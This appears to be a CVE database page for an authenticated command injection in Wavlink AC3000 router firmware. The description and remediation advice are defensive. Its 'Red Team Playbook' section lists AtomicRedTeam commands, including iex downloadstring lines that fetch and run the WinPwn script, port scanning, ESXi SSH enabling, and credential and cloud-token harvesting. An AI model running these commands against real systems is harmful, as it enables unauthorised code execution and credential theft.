CVE-2024-38666
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the openvpn_client_setup() function of the openvpn.cgi component in Wavlink AC3000 firmware M33A8.V5030.210505. The affected feature processes external HTTP requests without adequate sanitization, enabling crafted inputs to alter command execution flow on the device.
Vulnerability Description
An external config control vulnerability exists in the openvpn.cgi openvpn_client_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Impact
An attacker with valid authentication credentials can execute arbitrary commands on the affected device remotely, potentially compromising device integrity and network security. This could facilitate unauthorized control, data exfiltration, or lateral movement within the network. The attack requires network access and authenticated HTTP requests (PR:H), with no user interaction needed, and impacts confidentiality, integrity, and availability as indicated by the CVSS vector (C:H/I:H/A:H).
Solution
Wavlink has addressed this vulnerability in updated firmware versions beyond M33A8.V5030.210505. Users should upgrade the Wavlink AC3000 firmware to the latest release as detailed in the Talos advisory (https://talosintelligence.com/vulnerability_reports/TALOS-2024-2051). No alternative workarounds are specified; applying the official firmware update is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the openvpn.cgi functionality of the Wavlink AC3000 M33A8 router firmware is characterized by an external configuration control flaw that allows for arbitrary command execution. This issue arises from improper handling of specially crafted HTTP requests within the openvpn_client_setup() function. When an attacker sends a maliciously constructed request, the system may execute unintended commands with the privileges of the web server, potentially compromising the device and the network it serves. This vulnerability highlights a critical weakness in the input validation and authentication mechanisms employed by the device, which can be exploited if an attacker is able to authenticate to the web interface.
Attack vectors for this vulnerability primarily involve authenticated HTTP requests. An attacker must first gain access to the administrative interface of the device, which could be achieved through various means such as credential theft, social engineering, or exploiting weak passwords. Once authenticated, the attacker can craft specific requests that leverage the vulnerability to execute arbitrary commands on the device. This could lead to the installation of malware, data exfiltration, or even the manipulation of network traffic, thereby compromising the integrity and confidentiality of the entire network. The ease of exploitation, combined with the high level of access granted to authenticated users, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on the affected router for their network infrastructure. Successful exploitation could lead to significant business risks, including data breaches, loss of sensitive information, and disruption of services. The ability to execute arbitrary commands could allow attackers to pivot to other devices within the network, escalating their access and potentially leading to further compromises. Additionally, the reputational damage resulting from a security incident could have long-lasting effects on customer trust and business relationships. Organizations may also face regulatory repercussions depending on the nature of the data compromised, further exacerbating the financial and operational impact.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the router firmware to the latest version is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring solutions should be employed to detect unusual traffic patterns or unauthorized access attempts, particularly to the administrative interface. Additionally, organizations should enforce strong password policies and consider implementing two-factor authentication to reduce the risk of unauthorized access. Conducting regular security assessments and penetration testing can also help identify potential weaknesses in the network infrastructure, allowing for proactive measures to be taken before an attacker can exploit such vulnerabilities.
In conclusion, the external configuration control vulnerability in the Wavlink AC3000 M33A8 router firmware presents a significant threat to both individual users and organizations. The potential for arbitrary command execution, coupled with the necessity for authenticated access, creates a unique challenge for cybersecurity professionals. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare their defenses and mitigate the associated risks. Continuous vigilance, timely updates, and robust security practices are essential to safeguarding against such vulnerabilities in an increasingly interconnected world.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wavlink | Wl-Wn533a8 Firmware | m33a8.v5030.210505 |
cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.210505:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-38666 |
| talosintelligence.com |
GitHub CVE
|
https://talosintelligence.com/vulnerability_reports/TALOS-2024-2051 |
| talosintelligence.com |
NVD API
Exploit
Third Party Advisory
|
https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2051 |